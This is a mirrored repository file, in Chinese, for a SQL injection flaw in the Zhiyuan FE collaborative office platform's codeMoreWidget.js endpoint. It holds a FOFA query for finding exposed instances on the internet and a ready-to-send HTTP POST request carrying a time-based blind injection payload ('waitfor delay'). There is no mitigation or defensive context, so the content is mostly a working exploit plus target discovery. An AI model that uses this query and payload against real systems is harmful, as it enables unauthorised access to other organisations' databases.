mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
21 lines
343 B
Markdown
21 lines
343 B
Markdown
## 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞
|
|
|
|
## fofa
|
|
|
|
```
|
|
title="FE协作办公平台" || body="li_plugins_download"
|
|
```
|
|
|
|
## poc
|
|
|
|
```
|
|
POST /common/codeMoreWidget.js%70 HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 32
|
|
|
|
code=-1';waitfor delay '0:0:5'--
|
|
```
|
|
|